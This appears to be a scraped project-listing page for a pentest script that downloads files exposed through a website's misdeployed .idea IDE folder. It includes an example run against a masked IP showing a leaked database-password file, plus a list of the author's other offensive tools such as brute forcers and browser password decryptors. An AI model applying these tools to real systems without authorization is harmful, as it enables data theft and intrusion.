lijiejie/idea_exploit lijiejie/idea_exploit

  • Stars
    star
    357
  • Rank 119,149 (Top 3 %)
  • Language
    Python
  • Created over 5 years ago
  • Updated over 2 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
lijiejie/idea_exploit
github

lijiejie

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Gather sensitive information from (.idea) folder for pentesters

.idea disclosure exploit

A script use .idea folder to gather sensitive information for pentesters .

Websites not correctly deployed let their IDE config folder (.idea) exposed to hacker,

which can lead password or archived data files leaked.

The scanner will try to download all files, please recheck local files by yourself.

Requirements

pip install lxml requests

Requirements

  • 2022-08-05: Bug Fix and python3 support

Example

Our scanner reported a vulnerability this afternoon

scanner_pannel

As you can see, the file DbConnCfg.json leaked db password.

D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
[+] Module name is {mask}
[+] Type is web_module
[+] About 67 urls to process
[200] /cfg/DbConnCfg.json
[200] /bi/applepay/comm.php
[200] /bi/applepay/ipn_ios.php
[404] /auth/auth_ios/auth_guest.php
...
[200] /ver/ver_util.php
All files saved to 107.{mask}.{mask}.151/idea_exp_report.html

contain_password

More Repositories

1

subDomainsBrute

A fast sub domain brute tool for pentesters
Python
3,444
star
2

GitHack

A `.git` folder disclosure exploit
Python
3,050
star
3

BBScan

A fast vulnerability scanner helps pentesters pinpoint possibly vulnerable targets from a large number of web servers
Python
2,166
star
4

ds_store_exp

A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.
Python
1,495
star
5

swagger-exp

A Swagger API Exploit
JavaScript
1,136
star
6

htpwdScan

HTTP weak pass scanner
Python
900
star
7

EasyPen

EasyPen is a GUI program which helps pentesters do target discovery, vulnerability scan and exploitation
JavaScript
606
star
8

IIS_shortname_Scanner

an IIS shortname Scanner
Python
522
star
9

eyes.sh

Optimized DNS/HTTP Log Tool for pentesters, faster and easy to use.
HTML
378
star
10

MisConfig_HTTP_Proxy_Scanner

The scanner helps to scan misconfigured reverse proxy servers and misconfigured forward proxy servers
Python
170
star
11

edu-dns-zone-transfer

script to scan edu.cn DNS Servers
Python
89
star
12

log4j2_vul_local_scanner

Log4j 漏洞本地检测脚本。 Scan all java processes on your host to check whether it's affected by log4j2 remote code execution vulnerability (CVE-2021-45046)
Python
85
star
13

struts2_045_scan

Struts2-045 Scanner
Python
73
star
14

OutLook_WebAPP_Brute

Microsoft Outlook WebAPP Brute
Python
64
star
15

WIFIpass

decrypt all saved WIFI passwords on your PC
Python
61
star
16

chromePass

Decrypt all saved Chrome passwords
Python
41
star
17

NPUcat

NPUcat one click proxy
Python
9
star
18

DNS_AXFR_Client

A python DNS Transfer Client
Python
8
star
19

lijiejie

1
star